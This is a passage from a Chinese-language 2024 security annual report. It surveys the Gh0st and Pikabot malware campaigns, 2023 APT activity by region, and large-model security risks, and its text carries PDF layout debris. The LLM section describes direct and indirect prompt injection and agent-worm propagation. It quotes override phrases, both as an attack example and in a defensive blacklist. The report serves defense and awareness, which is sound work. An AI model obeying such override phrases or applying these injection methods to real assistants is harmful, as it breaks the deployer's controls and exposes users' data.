QQ,通过社交工程向目标发送伪装成正常文件的木马并引诱其下载执行。而对于一些公司单位,在时机成熟条件允许情况下,该组织成员得以加入目标所在群聊进行投毒。投毒文件的名称往往与财务、政策相关,极具诱导性,旨在降低受害者防范意识,使其放松警惕从而中招。之后攻击者可控制受害者的通讯软件转发钓鱼文件或链接,以求感染更多受害者。银狐版 Gh0st 引发的一系列安全事件危害极大。攻击者利用微信、QQ 等社交软件,从私域打开突破口,对目标进行远程控制。对个人而言,一旦攻击者开始操控受害者的社交软件,可将攻击面扩大至其联系人和群聊,窃取更多用户隐私,甚至故意制造混乱,为当事人带来巨大的麻烦。Pikabot2023 年 2 月,一种名为 Pikabot 的新型僵尸网络木马出现在 Windows 平台,主要通过网络安全2024-守初心 创新质绿盟版3-13排版.indd 42网络安全2024-守初心 创新质绿盟版3-13排版.indd 422024/5/8 17:43:012024/5/8 17:43:01043安全态势篇钓鱼邮件与假冒知名软件进行传播。该家族可对肉鸡进行命令控制活动并下发其他恶意软件,在 2023 下半年活跃频繁,现阶段已成为 Windows 平台活动最猖獗的家族之一,对网络空间造成极大威胁。2023 年 8 月,国际联合执法力量对知名银行木马 Qkabot 发起清剿活动致其逐渐示微。Pikabot 借机与其他家族瓜分了 Qakbot 缺位留下的市场份额,占据其生态位并迅速扩张。为匹配快速增长的肉鸡数,Pikabot僵尸网络运营者先后在上下半年对C&C进行了大规模扩充。为加强僵尸网络控制的稳定性,Pikabot 运营者将这些 C&C 托管于三大洲 14 个国家的 20 余个云服务商平台上,以增强自身抗清剿风险的能力。Pikabot 不仅提供了远程控制功能,还可以像 Qakbot、Emotet 一样为其他家族提供分发服务。目前,Pikabot 已被发现存在投递 CobaltStrike 的行为。考虑 Qakbot、Emotet 曾参与勒索软件攻击事件,Pikabot 的能力恐使其成为更高威胁活动的跳板,对个人,企业以及国家安全造成难以估量的损失。2.7 APT 攻击态势2.7.1 本年度 APT 威胁趋势总览2023 年,绿盟科技伏影实验室观测发现全球 APT 活动数量达到新高,同比上升明显。本年度伏影实验室通过全球威胁狩猎系统捕获了 81 个组织 607 条 APT 攻击线索,相比去年增长 26.9%。这些线索在梳理后可以对应至 362 起 APT 事件,其中 39 起事件由伏影实验室通过研究报告或社交媒体首次披露。网络安全2024-守初心 创新质绿盟版3-13排版.indd 43网络安全2024-守初心 创新质绿盟版3-13排版.indd 432024/5/8 17:43:022024/5/8 17:43:02044网络安全 2024:守初心 创新质Gamaredon,33Kimsuky,27Donot,27Lazarus,24Bitter,22TransparentTribe,20APT37,15SideCopy,14APT29,14Patchwork,13未确认,12Sidewinder,12Konni,12DarkPink,6APT34,6CloudAtlas,6Confucius,6MuddyWater,6APT28,5DangerousPassword,52023年年APT组织组织事件数量事件数量占比统计占比统计图 2.28 2023 年 APT 组织事件数量占比统计本年度伏影实验室 APT 情报库共收录 APT 活动报告 163 篇,分别关联至 72 个已知的APT 组织,其中包括 27 个全年活动数量超过 2 次的活跃 APT 组织。05101520LazarusAPT29APT34沙虫MuddyWaterGamaredon摩诃草SideCopy伪猎者YoroTrooperSidewinderDonotAPT33:group图 2.29 2023 年 APT 组织相关报告统计网络安全2024-守初心 创新质绿盟版3-13排版.indd 44网络安全2024-守初心 创新质绿盟版3-13排版.indd 442024/5/8 17:43:022024/5/8 17:43:02045安全态势篇本年度,由于印度与其邻国关系持续紧张,南亚方面 APT 组织活动非常活跃,事件数量占比超过三成(116 件);东亚方面受到朝鲜半岛态势升级的影响,APT 活动较多,事件数量占比达到 26%(91 件);而东欧与中东方面由于俄乌冲突的持续以及巴以冲突的爆发,APT 事件数量同样居高不下,分别占比 21%(74 件)与 8%(29 件);其他 APT 事件的来源方向还包括东南亚、南美、中亚和西欧和北美。南亚南亚32.31%东亚东亚25.35%东欧东欧20.61%中东中东8.08%东南亚东南亚1.95%南美南美1.39%中亚中亚1.11%西欧西欧0.28%北美北美0.28%未确认未确认8.64 23年年APT攻击事件攻击事件区域分布统计区域分布统计图 2.30 2023 年 APT 攻击事件区域分布统计APT 活动受害目标方面,受全球局势持续动荡影响,2023 年以政治目的为导向的 APT攻击活动数量较多,各国政府部门成为受害重灾区;除此之外受攻击较多的领域还包括科研机构、国防军工业、金融机构、通信业、各类企业与基础设施等。网络安全2024-守初心 创新质绿盟版3-13排版.indd 45网络安全2024-守初心 创新质绿盟版3-13排版.indd 452024/5/8 17:43:022024/5/8 17:43:02046网络安全 2024:守初心 创新质2023年年APT活动活动攻击目标攻击目标行业分布行业分布图 2.31 2023 年 APT 活动攻击目标行业分布2.7.2 重点地区的 APT 活动2.7.2.1 针对我国的 APT 活动2023 年,针对我国的 APT 攻击行动数量进一步增加,关联的 APT 组织也更为多样。本年度,伏影实验室深度参与了多起境外组织对我 APT 攻击行动的调查取证工作,涉及APT 组织包括北美方向的 NSA(方程式),南亚方向的 Bitter(蔓灵花)、Patchwork(白象)、Donot(肚脑虫),东南亚方向的 OceanLotus(海莲花),东亚方向的 DarkHotel(暗店),欧洲方向的 Shathak(沙塔克),以及疑似来自亚洲的双异鼠组织。这些 APT 事件绝大多数以间谍式信息窃取为驱动,攻击目标领域涵盖我国的政府机关、国有企业、高等院校等关键基础设施。网络安全2024-守初心 创新质绿盟版3-13排版.indd 46网络安全2024-守初心 创新质绿盟版3-13排版.indd 462024/5/8 17:43:022024/5/8 17:43:02047安全态势篇图 2.32 2023 年对我 APT 攻击活动来源分布2.7.2.2 东亚区域的 APT 活动受朝韩关系持续恶化影响,本年度东亚地区朝鲜半岛方面的 APT 活动数量极多。朝鲜 APT 组织 Konni 与 Kimsuky 针对韩国的媒体、政府国防部、政府外交部、企业等发起数次钓鱼攻击行动,使用的诱饵包括“华盛顿宣言对朝核威胁的帮助”、“朝鲜人权组织活动的困难与激活他们的措施”等,与朝韩关系直接相关。Konni 组织还频繁使用一种通过chm 文件投递木马程序的攻击手法,对韩国金融企业、互联网企业以及民众进行钓鱼攻击。另一朝鲜 APT 组织 Lazarus 在本年度发动了多起大型 APT 行动,包括迄今以来影响范围最大的供应链攻击行动3CX 供应链攻击事件、针对 Windows IIS Web 服务器的网络攻击行动、针对欧洲制造业的“梦想工作行动”后续行动、针对俄罗斯导弹工程公司 NPO Mashinostroyeniya 的网络入侵活动、MagicLine4NX 零日漏洞供应链攻击行动、针对韩国军人的钓鱼攻击行动等。2.7.2.3 南亚区域的 APT 活动本年度,印巴两国的主要 APT 组织依旧保持活跃。印度 APT 组织 Donot(肚脑虫)在本年度广泛使用一种基于恶意远程模板文档和.buzz域名的鱼叉式钓鱼攻击策略,攻击目标包括巴基斯坦政府外交部门。另一印度 APT 组织 SideWinder(响尾蛇)也发起了针对巴基斯坦海军的邮件钓鱼攻击,该组织在 2023 年的攻击目标还包括不丹和尼泊尔等国的政府。另一印度 APT 组织 Patchwork 在 2023 年下半年开始通过 discord CDN 等途径传播该组网络安全2024-守初心 创新质绿盟版3-13排版.indd 47网络安全2024-守初心 创新质绿盟版3-13排版.indd 472024/5/8 17:43:022024/5/8 17:43:02048网络安全 2024:守初心 创新质织的专有木马 Spyder,再通过该木马下载商业远控木马 Remcos,实现对受害者主机的长期控制。巴基斯坦方面的APT组织TransparentTribe(透明部落)实施了大量针对印度的攻击行动,主要目标为印度的政府部门、军队、高校和各种民间组织,典型事件为针对印度量子计算领域科研机构的攻击行动。另一巴基斯坦 APT 组织 SideCopy 在 12 月开始尝试使用 WinRAR 漏洞 CVE-2023-38831来部署 AllaKore RAT、Drat、Ares RAT 等木马程序,主要目标为印度军事机构。2.7.2.4 东欧区域的 APT 活动受长期持续的俄乌冲突的影响,俄罗斯FSB下属APT组织Gamaredon保持对乌克兰军队、政府、警察、基础设施等的活跃攻势。Gamaredon 奉行基于域名池的大规模鱼叉式钓鱼邮件策略,并不注重网络攻击活动的隐蔽性,这也是该组织 APT 活动数量占比较多的主要原因。7 月,一个从 2022 年开始活动的俄罗斯 APT 组织 RomCom 在本月上旬使用 Office 0 day 漏洞 CVE-2023-36884 发起了针对欧盟峰会参与人员的钓鱼攻击活动。APT29 在 2023 年第二季度至第三季度策划了一轮针对 Microsoft Teams 服务使用者的社交媒体钓鱼攻击,主要目标为全球各政府组织或重要基础设施的工作人员。此外该组织还利用了团队协作服务器 TeamCity 的零日漏洞 CVE-2023-42793,发起了针对全球多个目标的大型公网设备入侵行动。该组织还在 9 月发起了一起规模较大的鱼叉邮件钓鱼活动,目标为包括乌克兰阿塞拜疆、希腊、罗马尼亚和意大利在内的多国大使馆和国际组织。APT28 在 2023 年年底的一次网络攻击活动中,使用零日漏洞 CVE-2023-23397 来窃取Microsoft Exchange 账户的 NTLM 哈希值,从而实现针对特定目标的钓鱼邮件攻击。另一方面,活跃在东欧与地中海区域的 APT 组织 CloudAtlas 发动了针对俄罗斯民众的网络攻击行为,表明乌克兰及其盟友方面也在持续进行针对俄罗斯的 APT 攻击行动。2.7.2.5 中东区域的 APT 活动2023 年,受区域国家民族矛盾激化与巴以冲突爆发等因素影响,中东区域的 APT 网络攻击活动数量激增。12 月中旬,疑似受以色列资助的黑客组织 Predatory Sparrow 对伊朗全国的加油站系统进行了网络攻击,导致伊朗境内 70%的加油站被迫转为手动操作。Predatory Sparrow 在该网络安全2024-守初心 创新质绿盟版3-13排版.indd 48网络安全2024-守初心 创新质绿盟版3-13排版.indd 482024/5/8 17:43:032024/5/8 17:43:03049安全态势篇行动中攻陷了加油站系统的中央服务器,并窃取了加油站的各类信息以及支付系统的详细信息。伊朗黑客组织 APT34 在 2023 年发起了针对美国企业的活动,并在活动中使用了一种SideTwist 木马的变体。另一伊朗 APT 组织 CharmingKitten(APT35)则在最近发现的一起大型 APT 行动中,使用一种名为 Sponsor 的新型后门攻击巴西、以色列和阿联酋等国家。此外,包括 Imperial Kitten、MuddyWater 等在内的多个伊朗 APT 组织在巴以冲突爆发后发动了针对以色列的网络攻击行动,目标涵盖以色列的交通、物流和技术部门。疑似来源于阿联酋的 StealthFalcon 使用了一种新型木马 Deadglyph,对中东地区多个目标进行攻击。未知来源的新 APT 组织 Sandman 开发了一种基于 LuaJIT 平台(Lua 语言)的模块化后门 LuaDream,借此攻击中东、西欧和南亚的电信提供商。另一个新型组织 Scarred Manticore 对中东的金融、政府、军事和电信部门发动了复杂的网络间谍活动,此次行动的受害者遍布沙特阿拉伯、阿拉伯联合酋长国、约旦、科威特、阿曼、伊拉克和以色列等多个国家。2.7.2.6 北美区域的 APT 活动2023 年 9 月,由绿盟科技伏影实验室发现的未知来源 APT 组织渴血鹰(AtlasCross)发动了针对美国红十字会及其关联组织的网络攻击行动,该组织在入侵目标组织的外部设备后,再通过构建针对特定目标钓鱼文档的方式实现内网渗透与远程控制。11 月底,美国 CISA 称该国的水务系统使用的 Unitronics PLC(可编程逻辑控制器)受到黑客攻击,并称攻击源很可能是来自伊朗的黑客组织 Cyber Av3ngers。这起攻击有可能是因为 Unitronics Vision 系列 PLC 在安全管理上的混乱导致的,黑客通过公网搜索或暴力破解等方式获取了该系统的密码,进而对其进行控制和利用。网络安全2024-守初心 创新质绿盟版3-13排版.indd 49网络安全2024-守初心 创新质绿盟版3-13排版.indd 492024/5/8 17:43:032024/5/8 17:43:0303新技术发展篇网络安全2024-守初心 创新质绿盟版3-13排版.indd 50网络安全2024-守初心 创新质绿盟版3-13排版.indd 502024/5/8 17:43:032024/5/8 17:43:03051新技术发展篇3.1 大模型安全3.1.1 热点安全事件OpenAI 于 2022 年 11 月 30 日开放测试 ChatGPT,随后 ChatGPT 在全球范围呈现现象级热度,从聊天、翻译、撰稿到代码编写等任务上均表现优异。ChatGPT 成为互联网发展二十年来增长速度最快的消费者应用程序。但在其备受追捧的同时,ChatGPT 也面临 AI 自身数据和模型方面的安全隐患。OpenAI 在隐私政策中提到,ChatGPT 会收集用户账户信息、对话相关的所有内容、互动中网页内的各种隐私信息(Cookies、日志、设备信息等),这些信息可能会被共享给供应商、服务提供商以及附属公司,数据共享过程可能会有未经授权的攻击者访问到模型相关的隐私数据,包括训练/预测数据(可能涵盖用户信息)泄露,模型架构、参数、超参数等。除了 ChatGPT 自身风险,近期也出现了利用 ChatGPT 热度对用户隐私实施窃取攻击的活动。如,Github 上非官方的开源 ChatGPT 桌面应用项目被发现植入高危险性木马1,用户一旦运行了安装的可执行文件,就会泄露自己的账户凭证、浏览器Cookies 等敏感信息,为避免更多的用户中招,该开源项目现已更改了下载地址。2023 年 8 月,全球开放应用软件安全项目组织(OWASP)发布了针对大语言模型应用的 Top10 潜在安全风险。该列表旨在提供一份实用的安全指南,介绍在部署或管理大模型时可能存在的安全风险。1https:/ 创新质绿盟版3-13排版.indd 51网络安全2024-守初心 创新质绿盟版3-13排版.indd 512024/5/8 17:43:032024/5/8 17:43:03052网络安全 2024:守初心 创新质图 3.1 大语言模型应用潜在安全风险 Top102023 年 ChatGPT 风靡全球,其强大功能持续引发各界学者和用户的热议,导致马斯克认为“我们离强大到危险的 AI 不远了”。随着大语言模型(LLM)在各领域的广泛应用的同时,也带来了多重风险。因此,未来只有了解其中潜在的风险和威胁,并采取相关措施去应对大模型不同层面的问题,保证其自身的安全性问题,才能确保该技术可以真正地应用到各个领域。3.1.2 国内外政策目前,世界各国都对 LLM 相关安全合规性提出了一定需求,例如,要求数据相关方采取一系列措施来保护用户的隐私和敏感信息,其中包括美国的 格雷姆-里奇-比利雷法(GLBA)网络安全2024-守初心 创新质绿盟版3-13排版.indd 52网络安全2024-守初心 创新质绿盟版3-13排版.indd 522024/5/8 17:43:042024/5/8 17:43:04053新技术发展篇和加州消费者隐私法案(CCPA),欧盟的通用数据保护条例(GDPR),英国的数据保护法案(DPA)等。这些法规严格规范了数据在收集、存储、使用、加工、传输、提供等各个环节中对于敏感数据的处理要求,也要求企业和组织必须采取适当的安全措施,确保对敏感信息的有效保护,并在发生泄露时及时报告并采取相应对策。为了应对快速发展的大模型及相关技术,我国在 2023 年 8 月 15 日开始施行生成式人工智能服务管理暂行办法(以下简称管理办法1),旨在规范生成式人工智能服务提供者在处理敏感信息时的行为,保障用户的隐私和个人信息安全,促进生成式人工智能服务的健康发展。根据该文件,生成式人工智能服务提供者在处理敏感信息时,需要严格遵守相关法律法规,保护用户的隐私和个人信息安全。具体要求包括:1、用户隐私保护:生成式人工智能服务提供者需要建立健全的用户隐私保护制度,保障用户的个人信息安全,不得擅自收集、使用、传播用户的个人信息;2、商业秘密保护:在处理敏感信息时,服务提供者需要严格遵守商业秘密保护相关法律法规,不得泄露或非法使用他人的商业秘密信息;3、安全评估和监督检查:有关主管部门将对生成式人工智能服务开展监督检查,服务提供者应当依法予以配合,按要求对训练数据来源、规模、类型、标注规则、算法机制机理等予以说明,并提供必要的技术、数据等支持和协助;4、保密义务:参与生成式人工智能服务安全评估和监督检查的相关机构和人员对在履行职责中知悉的国家秘密、商业秘密、个人隐私和个人信息应当依法予以保密,不得泄露或者非法向他人提供。管理办法 主要包含两种监管政策。其一,根据生成式人工智能服务的风险程度进行分类分级监管。其二,基于生成式人工智能服务在不同领域的应用,采取相应的行业部门监管。这一双管齐下的监管机制旨在及时识别相关问题并迅速采取有效措施。3.1.3 风险与防护策略随着大模型安全问题引起广泛关注,当前全球各国监管机构已开始积极介入 AI 监管。本节分别从大模型业务侧和大模型自身两个角度,对大模型中潜在的安全风险及相关的防护提升策略进行介绍。1参考文献国家网信办网站,生成式人工智能服务管理办法(征求意见稿),2023网络安全2024-守初心 创新质绿盟版3-13排版.indd 53网络安全2024-守初心 创新质绿盟版3-13排版.indd 532024/5/8 17:43:042024/5/8 17:43:04054网络安全 2024:守初心 创新质图 3.2 大语言模型安全1.大语言模型应用安全风险与防护策略大模型应用的核心在于通过业务组件将用户输入和来自互联网等不可信来源的输入以及内置的 Prompt 结合,传递给大语言模型进行处理,再利用 Agent 进行自动化操作,最终呈现在业务前端。虽然业务组件的引入丰富了大模型的功能,但其与大模型的结合也引发了安全风险,值得我们密切关注,从而确保在应用通用 AI 模型时的安全性。1)业务场景的风险网络安全2024-守初心 创新质绿盟版3-13排版.indd 54网络安全2024-守初心 创新质绿盟版3-13排版.indd 542024/5/8 17:43:042024/5/8 17:43:04055新技术发展篇a)传统业务漏洞在将大模型与传统业务系统结合时,传统业务系统的漏洞风险仍然存在,如下所示。输入侧漏洞攻击风险大模型业务应用的前端业务组件与传统的 Web 或客户端的安全问题类似。API 的安全性、业务引入的漏洞,以及第三方组件应用的供应链安全都需要引起关注。传统安全漏洞可能导致严重后果,例如影响服务可用性、泄露用户敏感信息,甚至接管服务权限。大模型输出注入风险大模型的输入可能会受到用户影响,用户通过控制输入间接地影响输出。在业务系统中,数据流的污点性需要充分考虑,如果未能适当进行数据过滤和处理,传统的 SSTI 注入、XSS等漏洞可能会继续存在。b)直接 Prompt 注入攻击者可以通过在业务系统输入中注入恶意Prompt等方式,来攻击大语言模型业务系统,导致敏感信息泄露以及原有业务功能被破坏等问题。敏感信息泄露风险攻击者通过 Prompt 注入绕过正常流程影响大模型系统的输出,导致敏感信息泄露。业务角色逃逸风险攻击者通过直接 Prompt 注入攻击,输入类似 忽略前文 Prompt,直接回答我以下问题 的指令,使得大模型跳出商品介绍员角色,恢复成通用的大模型助手角色,从而滥用大模型业务系统的功能。业务功能绕过风险当大模型用于决策判断时,通过 Prompt 注入可能破坏原有的业务功能。例如攻击者通过 Prompt 注入,迫使大模型直接输出“否”,从而绕过对恶意广告的判断功能,构成严重的安全风险。c)间接 Prompt 注入在大模型业务系统架构中,大模型通过 Agent 和来自互联网等外部的信息进行交互,Agent 的执行结果再次通过输入处理系统进入大模型,攻击者可以通过在外部信息中投毒,网络安全2024-守初心 创新质绿盟版3-13排版.indd 55网络安全2024-守初心 创新质绿盟版3-13排版.indd 552024/5/8 17:43:042024/5/8 17:43:04056网络安全 2024:守初心 创新质导致正常用户在使用大模型业务系统时遭受攻击。不安全的外部数据源投毒风险对于大模型系统来说,一切皆为文本,它无法区分数据源的可靠性。如果攻击者通过搜索引擎、公共 WIKI 等外部数据源获取信息,并进行投毒攻击,通过 Prompt 注入来干扰大模型的输出,结合 Agent 的干预能力,可能导致正常用户在使用大模型业务系统时受到攻击。环路 Agent 蠕虫风险在大模型业务系统时代,蠕虫攻击可能不再局限于传统代码层面的漏洞攻击,而可能以一种全新的 Agent 层面出现。攻击者通过外部数据源投毒干扰 Agent 的执行,将恶意信息投毒到互联网的更多位置,这些信息会影响到更多的大模型业务系统,从而形成一个循环。这种攻击模式类似蠕虫攻击。2)业务场景的安全防护策略由于在业务应用架构设计阶段需要结合考虑各个阶段潜在的安全风险,通过在整体业务架构中的用户输入侧、模型输出侧以及业务模型 Prompt 侧,设计相关的“守卫”组件实现模型侧输入和输出的验证与控制,以及结合增强业务模型自身 Prompt 对安全风险的对抗性,从而提升大语言模型在业务场景下的整体防御检测能力。图 3.3 大语言模型业务场景下的防御检测方案a)业务模型侧 Prompt 防御网络安全2024-守初心 创新质绿盟版3-13排版.indd 56网络安全2024-守初心 创新质绿盟版3-13排版.indd 562024/5/8 17:43:042024/5/8 17:43:04057新技术发展篇通过优化增强业务模型侧的 Prompt 内容以及文本结构,针对逃逸攻击、角色假定、Prompt 泄露等攻击手段展开防御检测,有效提升针对模型的攻击成本。Prompt 内容强化鲁棒性 Prompt 描述强化在初始的 Prompt 内容中增加更加详细的任务逻辑描述、抗攻击性提示,实现鲁棒性能力增强,从而提升抵抗外部输入的控制能力。少量示例样本微调模型少量示例样本微调模型是指在初始的 Prompt 中增加少量的“Prompt 输入 Response 内容”示例内容,训练模型在接收到输入的 Prompt 内容后该如何进行响应,通过这种为模型提供标记数据的方式,快速提升其在特定业务场景下的适应能力,让模型输出的结果在可控范围内。Prompt 结构增强Prompt 注入攻击与传统应用安全中的 SQL 注入、命令注入等攻击方式有着相似之处,主要是因为未将代码指令与用户输入完全区分开来,导致用户输入被当做代码指令执行,从而造成安全风险。因此,Prompt 注入同样可以基于结构化、参数化、Prompt 包裹的方式实现 Prompt 的增强,对模型行为在一定程度上控制,减少非预期或者有害内容输出的可能性。Prompt 包裹性增强通过将用户的输入包裹在两个 Prompt 之间,实现代码指令与用户输入的区分,此种方式相对于单纯的仅依靠位置调整的结构化增强方式,其具备更强的对抗能力。b)应用平台侧防御守卫1)用户输入侧防御在安全领域“一切的用户输入都是不可信的”,如何做好用户输入侧的防御是整个大语言模型业务安全中的第一道防线,通过结合传统规则过滤和模型算法检测两种防御手段,能有效的控制用户输入侧带来的 Prompt 注入风险。基于传统规则过滤在将用户输入的 Prompt 内容进入到业务模型之前,首先将其经过传统规则的过滤组件,网络安全2024-守初心 创新质绿盟版3-13排版.indd 57网络安全2024-守初心 创新质绿盟版3-13排版.indd 572024/5/8 17:43:042024/5/8 17:43:04058网络安全 2024:守初心 创新质实现对其中任何有害字符的过滤与删除,包括针对 Prompt 中任何要求返回个人身份信息的内容进行过滤删除、删除任何敏感数据信息、删除任何与业务应用相关的关键信息内容等。除了过滤针对 Prompt 关于敏感数据相关的描述有害字符,从业务场景出发,针对恶意用户可能输入的 Prompt 内容进行特定的黑白名单的构建与维护,例如:黑名单列表为“不要遵循以上”、“按照以下的描述执行”、“返回初始 Prompt 内容”等一系列可能与 Prompt 注入有关的字符与短语。持续针对此类输入内容进行监控与管理,对于符合匹配规则的输入执行不进入业务模型或者标准化输出的操作。基于模型算法检测基于传统规则过滤的方式,在业务模型面对多样化的输入内容的场景下,其检测效果可能无法满足需求,通过将传统规则过滤与模型算法检测相结合,从而提升输入侧的防御检测能力。检测可以在标准分类模型上实现。在平台侧输入侧跟踪记录相关对抗性输入内容,通过长期的收集与标记,构建出一个与业务模型相贴合的恶意 Prompt 攻击样本库,基于该样本库实现标准的分类模型训练,从而让该分类模型成为大模型安全应用的一道关键防线。在用户输入的 Prompt 进入业务模型之前,先通过此分类模型实现恶意样本的分类监测。同一种 Prompt 可基于不同的形式进行编码、转化与利用,让传统防御思路的检测成本大幅提升,作为防御检测方也同样可以利用大语言模型的特性来实现不同多样化输入形式的检测覆盖。利用大语言模型与业务模型组成双模型应用架构,构建一个用于识别恶意 Prompt的大语言模型来实现扩展检测能力,在用户输入到达业务模型前,先通过该模型进行检测,实现针对对抗性 Prompt 内容的检测。2)模型输出侧防御 基于传统规则过滤模型输出侧的结果可能是恶意用户 Prompt 注入成功后的内容,因此需要针对其中可能存在的数据模式进行相关的规则过滤,避免出现数据泄露以及模型滥用风险,包括针对 Prompt中任何包含个人身份信息的内容进行过滤删除、删除任何敏感数据信息、删除任何与业务应用相关的关键信息内容、删除任何与业务内容无关的 SQL、JavaScript、HTML 等代码内容,避免出现恶意代码利用风险等。基于模型算法检测在业务模型具备理解上下文的情况下,模型输出的结果会随着用户 Prompt 的描述出现网络安全2024-守初心 创新质绿盟版3-13排版.indd 58网络安全2024-守初心 创新质绿盟版3-13排版.indd 582024/5/8 17:43:042024/5/8 17:43:04059新技术发展篇多样化的形式,因此模型输出侧同样需要结合模型算法来提升防御检测能力。模型输出侧检测的一种思路是对合规性模型结果进行审查。针对模型输出侧可以训练具备数据安全审查能力的合规审查模型,通过构建相关数据集实现审查模型的训练,主要从两个方面进行考虑,一方面是非合规内容输出,针对身份证、手机号等敏感数据进行合规性审查,另一方是非预期结果输出,针对 SQL 注入、命令执行、XSS、SSRF 等攻击性 Payload 进行非预期输出结果审查。2.大模型自身安全风险与防护策略1)大模型的安全风险与传统的端到端模型不同,大模型采用预训练-微调的训练范式,首先在大量的未标注数据上进行预训练,继而在下游任务的标注数据上微调,得到垂直领域模型。一般认为,模型的训练过程、结构越复杂,其面临安全风险系数就越高,但不能以此简单地判断大模型较传统模型面临的安全威胁更严重。同质化、多模态对齐等因素会导致大模型面临更多类型的安全威胁,但由于大模型具备海量参数、微调所需的敏感数据更少的特点,也一定程度上缓解了大模型遭受对抗样本、数据隐私泄露的风险。大模型内外面临多重安全威胁。对内来讲,大模型参数量剧增带来的涌现能力也引发了新的偏见和不确定风险;多模态学习增加了对齐风险;大模型内部存在可解释性不足风险;而基础模型缺陷在下游模型上的继承效应也需要有对应的缓解策略。对外而言,大模型则面临着来自恶意攻击者的对抗攻击、后门攻击、成员推断攻击、模型窃取等影响模型性能、侵犯隐私数据的威胁。大模型在生命周期中面临的安全风险如下图所示:图 3.4 大模型安全风险总览针对大规模训练数据集的攻击,如投毒攻击。相较于传统端到端的模型,该数据集中的网络安全2024-守初心 创新质绿盟版3-13排版.indd 59网络安全2024-守初心 创新质绿盟版3-13排版.indd 592024/5/8 17:43:052024/5/8 17:43:05060网络安全 2024:守初心 创新质数据类型众多,涵盖图像、文本、语音、代码等多种数据,且来源于网页、书籍、社交平台等未经验证的多种公开渠道,因此投毒攻击的风险更高。另外,多模态数据之间的对齐问题会影响到基础模型的预测准确率。微调使用的数据集存在安全风险。同样地,数据来源的可靠性会影响到模型质量,数据集也存在隐私泄露风险。基础模型的安全性会影响到下游模型的安全性。基础模型的脆弱性会被下游模型继承,基础模型鲁棒也会使下游模型更可靠;基础模型如果对部分训练数据进行了“记忆”,则下游模型也面临相同的风险。由于微调所需的敏感数据较传统端到端模型会更少,这一点能够降低数据隐私泄露风险。另外,基础模型同质化的特点会进一步扩大基础模型安全性的影响。模型推理阶段存在的安全风险。在推理阶段,攻击者一般通过 API 接口访问黑盒大模型,大模型面临着对抗样本、模型窃取、成员推断攻击、提示注入等多重威胁。2)大模型的安全防护策略针对大模型的风险,本节从鲁棒性、可靠性、隐私性、公平性和可解释性五个可信属性角度介绍大模型安全性提升策略,包括对可信属性的红队测试(Red Teaming)评估策略、可信属性的保障和提升方法等。图 3.5 大模型安全评估和防护网络安全2024-守初心 创新质绿盟版3-13排版.indd 60网络安全2024-守初心 创新质绿盟版3-13排版.indd 602024/5/8 17:43:052024/5/8 17:43:05061新技术发展篇 鲁棒性鲁棒性代表了模型抵抗外部扰动、输入噪声的能力,面对干扰因素,模型应当维持预测的正确性。大模型鲁棒性的保障和增强可以从数据和模型两个角度进行,包括异常数据检测、数据清洗(例如启发式检测方法过滤样本1)、数据增强(例如基于矩阵补全的数据增强方案2)、知识蒸馏(Knowledge Distillation)3、鲁棒训练(例如 Adversarial fine-tuning procedure4)、模型清洗等。隐私性隐私性是模型保护隐私数据的能力,确保未得到授权的用户无法接触到大模型的隐私信息,隐私信息既包括入模数据的属性和数值,也包括模型自身信息等敏感数据。具体地讲,机密性的保障需防止未经授权的用户尝试访问或推断入模数据以及模型参数、架构、梯度等信息的行为,包括对训练数据、模型信息的恶意窃取、重构恢复、特征推断攻击等。大模型鲁棒性的保障思路,包括加密存储、差分隐私(Differential Privacy)、同态加密(Homomorphic Encryption)、安全多方计算(Secure Multi-Party Computation)、模型水印5和指纹6等。公平性公平性是模型在面对不同群体、个体时不受敏感属性影响的能力。模型参数的激增带来了模型能力的提升,但同时也增大了模型出现未知有害行为的风险,也就是说,大模型的涌现(Emergence)特点可能会进一步加剧模型偏见。大模型偏见来源于:在数据层面存在标签偏见、训练数据分布不均衡、数据抽样偏差、数据增强偏见等难以避免的不公平因素,可能导致性别歧视、种族歧视、基于宗教的偏见、文化偏见、地域政治偏差、刻板印象等有害的社会成见;在模型层面,人工智能算法的设计准则可能具备某种程度上的主观性,从而导致在模型输出上出现对某一类数据的偏好;在人员层面,人类反馈强化学习会因参与者自身背景特征和个人认知偏见而引入微妙的偏差。公平性的保障也是校准模型偏见的过程,使用一些纠偏技术和思路削减模型在敏感属性上的偏见,具体方案包括数据偏差消除、人类反馈强化学习(Reinforcement Learning with Human Feedback,RLHF)、AI 反馈强化学习(RL 1K.Huang,Y.Li,B.Wu,Z.Qin,K.Ren,Backdoor defense via decoupling the training process,Publisher,City,20222H.He,K.Zha,D.Katabi,Indiscriminate poisoning attacks on unsupervised contrastive learning,Publisher,City,20223A.Saha,A.Tejankar,S.A.Koohpayegani,H.Pirsiavash,Backdoor attacks on self-supervised learning,in:Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition,2022,pp.13337-133464Z.Yang,J.Shi,J.He,D.Lo,Natural attack for pre-trained models of code,in:Proceedings of the 44th International Conference on Software Engineering,2022,pp.1482-1493.5J.Kirchenbauer,J.Geiping,Y.Wen,J.Katz,I.Miers,T.Goldstein,A watermark for large language models,Publisher,City,20236H.Cheng,X.Li,H.Wang,X.Zhang,X.Liu,M.Wang,F.Li,DeepDIST:A Black-box Anti-collusion Framework for Secure Distribution of Deep Models,Publisher,City,2023.网络安全2024-守初心 创新质绿盟版3-13排版.indd 61网络安全2024-守初心 创新质绿盟版3-13排版.indd 612024/5/8 17:43:052024/5/8 17:43:05062网络安全 2024:守初心 创新质from AI Feedback,RLAIF)1、道德问题自我纠正(Moral Self-Correction)、上下文学习(In-Context Learning,ICL)、C4D 微调框架2、Auto-Debias 去偏方法3。可靠性可靠性是描述模型在现实世界环境中一致工作、正确地完成目标任务的属性,确保模型面对未知数据应具备正确预测的能力。大模型可靠性的保障方案可以通过高质量的训练数据,确保大模型使用的训练数据是准确、全面、代表性的,以此保障高质量的数据对模型性能产生正面影响。提升数据集质量的方式有异常数据检测和清洗、数据转换、数据增强、数据质量持续监控和维护等,常见的方式是直接使用增强的数据集(如 YFCC100M4、LAION-5B5等)或为用对应的数据集强化工具对现有的数据集进行优化(如使用 BigDetection6、REINA 方法7增强标记数据集等)。此外,可以采用多样化的评估策略、管理模型的不确定性、提高模型可解释性等方法增强系统的可靠性。可解释性可解释性是模型使用者直观理解模型内部机制和决策逻辑、确保人工智能可问责的重要性质。模型可解释方法采用的思路一般分为对数据的可视化和统计分析等事前可解释方法、对模型的可视化和静态分析技术、对模型预测结果的假设检验等事后可解释方法。这些方法对输入特征、模型神经元等因子的重要性提供局部或全局的可解释性。大模型可解释性的保障手段包括可视化方法、基于扰动的可解释方法(例如 